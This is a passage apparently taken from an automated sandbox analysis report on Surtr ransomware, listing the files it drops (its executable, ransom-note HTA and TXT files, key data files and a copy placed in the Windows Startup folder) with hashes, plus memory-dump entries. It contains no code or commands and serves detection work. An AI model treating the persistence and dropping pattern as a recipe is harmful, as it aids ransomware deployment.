  SHA1: 8898c1fc86590b8f2ec053a525e9f823b89c9c31
  SHA256: 60765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64
  SHA512: 95753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76
- C:\ProgramData\Service\Private_DATA.surt
  Filesize: 1KB
  MD5: a6d8b309d8fc19204b5bacccd10a3b23
  SHA1: 1fd075ce4724b9ef845da309bd34446ebea07670
  SHA256: 4fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c
  SHA512: ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d
- C:\ProgramData\Service\Public_DATA.surt
  Filesize: 204B
  MD5: d501698a84bcbbeeda66a16073474c28
  SHA1: a6da3c4b1cfeae541ed33cb0186309a25a6e1faf
  SHA256: cbc140aa79c5a1a92a40be7292312536d2f705fcb56ee4417231485f475b161e
  SHA512: a60f77cbeb221a938ea72c8fa5e702d4ae0c275845cd81a752a0e98e8772eecd95bc46b136a506fbd47a1bceebe502805d4ac08d26fa231ad3180dd4ad4a3ad7
-
C:\ProgramData\Service\SURTR_README.htaFilesize
8KB
MD5c3df410a4e482aedc4f65be42d97daff
SHA18602bbe25e87df92110732ccadda2d96eb82f4cf
SHA25618452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
SHA512614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
-
C:\ProgramData\Service\SURTR_README.txtFilesize
621B
MD54c97b7389e84da2773ccb3443c234ae1
SHA17c66be6a0632a44ac2017e6e1bbd8f29809b61e2
SHA2562d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058
SHA512c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620
-
C:\ProgramData\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\SurtrBackGround.jpgFilesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.icoFilesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surtFilesize
14B
MD5a400ab7041049318608e1a9271e99d16
SHA18898c1fc86590b8f2ec053a525e9f823b89c9c31
SHA25660765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64
SHA51295753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76
-
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surtFilesize
1KB
MD5a6d8b309d8fc19204b5bacccd10a3b23
SHA11fd075ce4724b9ef845da309bd34446ebea07670
SHA2564fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c
SHA512ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d
-
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.htaFilesize
8KB
MD5c3df410a4e482aedc4f65be42d97daff
SHA18602bbe25e87df92110732ccadda2d96eb82f4cf
SHA25618452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a
SHA512614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
memory/108-111-0x0000000000000000-mapping.dmp
-
memory/360-65-0x0000000000000000-mapping.dmp
-
memory/416-71-0x0000000000000000-mapping.dmp
-
memory/468-63-0x0000000000000000-mapping.dmp
-
memory/524-64-0x0000000000000000-mapping.dmp
-
memory/532-102-0x0000000000000000-mapping.dmp
-
memory/544-89-0x0000000000000000-mapping.dmp
-
memory/556-104-0x0000000000000000-mapping.dmp
-
memory/592-82-0x0000000000000000-mapping.dmp
-
memory/736-66-0x0000000000000000-mapping.dmp
-
memory/760-99-0x0000000000000000-mapping.dmp
-
memory/776-98-0x0000000000000000-mapping.dmp
-
memory/792-107-0x0000000000000000-mapping.dmp
-
memory/812-86-0x0000000000000000-mapping.dmp
-
memory/816-103-0x0000000000000000-mapping.dmp
-
memory/868-110-0x0000000000000000-mapping.dmp
-
memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-55-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/956-60-0x0000000140133F50-mapping.dmp
-
memory/992-80-0x0000000000000000-mapping.dmp
-
memory/1012-101-0x0000000000000000-mapping.dmp
-
memory/1056-106-0x0000000000000000-mapping.dmp
-
memory/1200-78-0x0000000000000000-mapping.dmp
-
memory/1228-67-0x0000000000000000-mapping.dmp
-
memory/1356-69-0x0000000000000000-mapping.dmp
-
memory/1388-93-0x0000000000000000-mapping.dmp
-
memory/1408-88-0x0000000000000000-mapping.dmp
-
memory/1448-97-0x0000000000000000-mapping.dmp
-
memory/1460-105-0x0000000000000000-mapping.dmp
-
memory/1468-73-0x0000000000000000-mapping.dmp
-
memory/1476-75-0x0000000000000000-mapping.dmp
-
memory/1480-115-0x0000000000000000-mapping.dmp
-
memory/1484-74-0x0000000000000000-mapping.dmp
-
memory/1500-77-0x0000000000000000-mapping.dmp
-
memory/1532-94-0x0000000000000000-mapping.dmp
-
memory/1552-92-0x0000000000000000-mapping.dmp
-
memory/1580-96-0x0000000000000000-mapping.dmp
-
memory/1608-95-0x0000000000000000-mapping.dmp
-
memory/1636-87-0x0000000000000000-mapping.dmp
-
memory/1640-72-0x0000000000000000-mapping.dmp
-
memory/1676-117-0x0000000000000000-mapping.dmp
-
memory/1716-91-0x0000000000000000-mapping.dmp
-
memory/1728-83-0x0000000000000000-mapping.dmp
-
memory/1736-81-0x0000000000000000-mapping.dmp
-
memory/1752-108-0x0000000000000000-mapping.dmp
-
memory/1756-84-0x0000000000000000-mapping.dmp
-
memory/1772-100-0x0000000000000000-mapping.dmp
-
memory/1784-68-0x0000000000000000-mapping.dmp
-
memory/1812-70-0x0000000000000000-mapping.dmp
-
memory/1824-79-0x0000000000000000-mapping.dmp
-
memory/1860-76-0x0000000000000000-mapping.dmp
-
memory/1888-90-0x0000000000000000-mapping.dmp
-
memory/1900-109-0x0000000000000000-mapping.dmp
-
memory/1912-113-0x0000000000000000-mapping.dmp
-
memory/1944-85-0x0000000000000000-mapping.dmp
-
memory/1988-112-0x0000000000000000-mapping.dmp
-
memory/2036-114-0x0000000000000000-mapping.dmp
-
memory/2052-118-0x0000000000000000-mapping.dmp
-
memory/2060-116-0x0000000000000000-mapping.dmp
-
memory/2212-120-0x0000000000000000-mapping.dmp
-
memory/2220-119-0x0000000000000000-mapping.dmp
-
memory/2228-121-0x0000000000000000-mapping.dmp
-
memory/2236-123-0x0000000000000000-mapping.dmp
-
memory/2248-125-0x0000000000000000-mapping.dmp
-
memory/2256-124-0x0000000000000000-mapping.dmp
-
memory/2264-122-0x0000000000000000-mapping.dmp
-
memory/4092-137-0x000007FEFC241000-0x000007FEFC243000-memory.dmpFilesize
8KB